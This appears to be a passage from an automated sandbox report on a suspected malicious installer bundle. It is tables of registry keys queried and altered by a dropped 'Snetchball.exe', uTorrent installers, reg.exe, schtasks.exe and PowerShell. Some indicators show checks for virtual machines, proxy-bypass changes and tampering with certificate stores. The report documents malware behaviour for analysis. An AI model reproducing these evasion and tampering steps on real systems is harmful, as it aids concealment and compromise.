| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Steam\steam.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\E:\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\FriendlyName | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Steam\steam.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Steam\steam.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\utorrentie.exe = "11000" | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION\utorrentie.exe = "1" | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CROSS_DOMAIN_REDIRECT_MITIGATION | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CROSS_DOMAIN_REDIRECT_MITIGATION\utorrentie.exe = "0" | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
